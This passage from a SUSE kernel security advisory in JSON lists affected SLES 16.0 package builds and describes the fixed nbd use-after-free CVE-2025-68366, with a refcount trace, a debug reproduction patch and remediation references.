"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68361"
},
{
"cve": "CVE-2025-68366",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68366"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config unlock in nbd_genl_connect\n\nThere is one use-after-free warning when running NBD_CMD_CONNECT and\nNBD_CLEAR_SOCK:\n\nnbd_genl_connect\n nbd_alloc_and_init_config // config_refs=1\n nbd_start_device // config_refs=2\n set NBD_RT_HAS_CONFIG_REF\t\t\topen nbd // config_refs=3\n recv_work done // config_refs=2\n\t\t\t\t\t\tNBD_CLEAR_SOCK // config_refs=1\n\t\t\t\t\t\tclose nbd // config_refs=0\n refcount_inc -\u003e uaf\n\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290\n nbd_genl_connect+0x16d0/0x1ab0\n genl_family_rcv_msg_doit+0x1f3/0x310\n genl_rcv_msg+0x44a/0x790\n\nThe issue can be easily reproduced by adding a small delay before\nrefcount_inc(\u0026nbd-\u003econfig_refs) in nbd_genl_connect():\n\n mutex_unlock(\u0026nbd-\u003econfig_lock);\n if (!ret) {\n set_bit(NBD_RT_HAS_CONFIG_REF, \u0026config-\u003eruntime_flags);\n+ printk(\"before sleep\\n\");\n+ mdelay(5 * 1000);\n+ printk(\"after sleep\\n\");\n refcount_inc(\u0026nbd-\u003econfig_refs);\n nbd_connect_reply(info, nbd-\u003eindex);\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68366",
"url": "https://www.suse.com/security/cve/CVE-2025-68366"
},
{
"category": "external",
"summary": "SUSE Bug 1255622 for CVE-2025-68366",
"url": "https://bugzilla.suse.com/1255622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
